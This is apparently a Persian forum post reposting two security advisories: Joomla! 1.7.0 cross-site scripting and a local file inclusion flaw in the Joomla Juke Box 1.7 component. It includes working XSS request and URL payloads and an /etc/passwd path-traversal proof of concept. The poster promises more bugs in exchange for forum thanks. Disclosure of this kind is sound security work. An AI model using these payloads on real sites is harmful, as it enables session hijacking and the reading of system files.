انم دوتا از 1.7
Topic :
Joomla! 1.7.0 Cross Site Scripting
Arrow WLB : WLB-2011100017 (About)
Arrow SecurityAlert : None
Arrow Date : 2011-10-02
Arrow Credit : yehg
Arrow SecurityRisk : Low Security Risk Low (About)
Arrow Remote : Yes
Arrow Local : No
Arrow Status : Bug
Arrow History : [2011-10-02] Started
Arrow Affected software : Joomla! 1.7.0
Arrow Text :
Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities
1. OVERVIEW
Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
Scripting issues.
2. BACKGROUND
Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
modelâviewâcontroller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.
3. VULNERABILITY DESCRIPTION
Several parameters (searchword, extension, asset, author ) in Joomla!
Core components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.
4. VERSION AFFECTED
1.7.0 <=
5. PROOF-OF-CONCEPT/EXPLOIT
component: com_search, parameter: searchword (Browser: IE, Konqueror)
=====================================================================
[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456
task=search&Itemid=435&searchword=Search';onunload=function(){x=con
firm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,
101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116
,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,11
1,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode
(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&
;option=com_search
[/REQUEST]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
User Login is required to execute the following XSSes.
Parameter: extension, Component: com_categories
====================================================
http://localhost/joomla17_noseo/administrator/index.php?option=com_categori
es&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%
22width:3000px!important;height:3000px!important;z-index:999999;position:ab
solute!important;left:0;top:0;%22%20x=%22
Parameter: asset , Component: com_media
====================================================
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&am
p;view=images&tmpl=component&e_name=jform_articletext&asset=1%2
2%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;heigh
t:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;
%22x=%22&author=
Parameter: author, Component: com_media
====================================================
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&am
p;view=images&tmpl=component&e_name=jform_articletext&asset=&am
p;author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!imp
ortant;height:3000px!important;z-index:999999;position:absolute!important;l
eft:0;top:0;%22x=%22
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
6. IMPACT
Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.
7. SOLUTION
Upgrade to Joomla! 1.7.1-stable or higher.
8. VENDOR
Joomla! Developer Team
http://www.joomla.org
9. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
10. DISCLOSURE TIME-LINE
2011-07-29: notified vendor
2011-09-26: patched version, 1.7.1-stable, released
2011-09-29: vulnerability disclosed
11. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.7.0-stable%5D_
cross_site_scripting%28XSS%29
Vendor Advisory URLs:
http://developer.joomla.org/security/news/367-20110901-core-xss-vulnerabili
ty
http://developer.joomla.org/security/news/368-20110902-core-xss-vulnerabili
ty
#yehg [2011-09-29]
Topic :
Joomla Component Juke Box 1.7 Local File Inclusion Vulnerability
Arrow SecurityAlert : 7243
Arrow CVE : CVE-2010-1352
Arrow CWE : CWE-22
Arrow SecurityRisk : Medium Security Risk Medium (About)
Arrow Remote Exploit : Yes
Arrow Local Exploit : No
Arrow Victim interaction required : No
Arrow Exploit Available : Yes
Arrow Credit : AntiSecurity
Arrow Published : 15.04.2010
Arrow Affected Software : jooforge:com_jukebox:1.0
jooforge:com_jukebox:1.7
Arrow Advisory Content :
===========================================================================
==================================
[o] Joomla Component Juke Box Local File Inclusion Vulnerability
Software : com_jukebox version 1.7
Vendor : http://www.jooforge.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/
===========================================================================
==================================
[o] Exploit
http://localhost/[path]/index.php?option=com_jukebox&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_jukebox&controller=../../../../../../
../../../../etc/passwd%00
===========================================================================
==================================
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
===========================================================================
==================================
[o] April 06 2010 - GMT +07:00 Jakarta, Indonesia
خوب تا اینجارو داشته باشین تا تشکر شده من به 135 برسه . تازه 30% از باگارو گزاشتم . اگه تشکرم برسه بقیش میزارم